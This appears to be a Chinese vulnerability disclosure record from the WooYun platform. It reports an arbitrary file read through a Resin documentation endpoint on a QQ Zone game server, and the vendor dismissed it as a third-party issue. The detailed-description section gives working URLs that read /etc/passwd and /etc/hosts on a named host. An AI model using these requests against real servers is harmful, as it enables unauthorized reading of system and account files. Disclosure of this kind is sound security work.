漏洞概要
关注数(24)
关注此漏洞
漏洞标题:QQ空间某游戏配置错误导致任意文件读取
相关厂商:腾讯
提交时间:2016-04-12 17:01
修复时间:2016-04-13 15:28
公开时间:2016-04-13 15:28
漏洞类型:应用配置错误
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2016-04-12: 细节已通知厂商并且等待厂商处理中
2016-04-13: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
寻侠?
详细说明:
resin的问题
读取/etc/passwd
http://s138.app24599.qqopenapp.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
访问
http://s138.app24599.qqopenapp.com/
跳转到寻侠官网
http://xia.qq.com/
读取hosts文件
http://s138.app24599.qqopenapp.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts
/etc/passwd文件
漏洞证明:
修复方案:
版权声明:转载请注明来源 小杰哥@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2016-04-13 15:28
厂商回复:
非常感谢您的反馈,经评估报告中反馈的问题并不属于腾讯业务,是第三方业务。如果您有任何的疑问,欢迎反馈,我们会有专人跟进处理。
最新状态:
暂无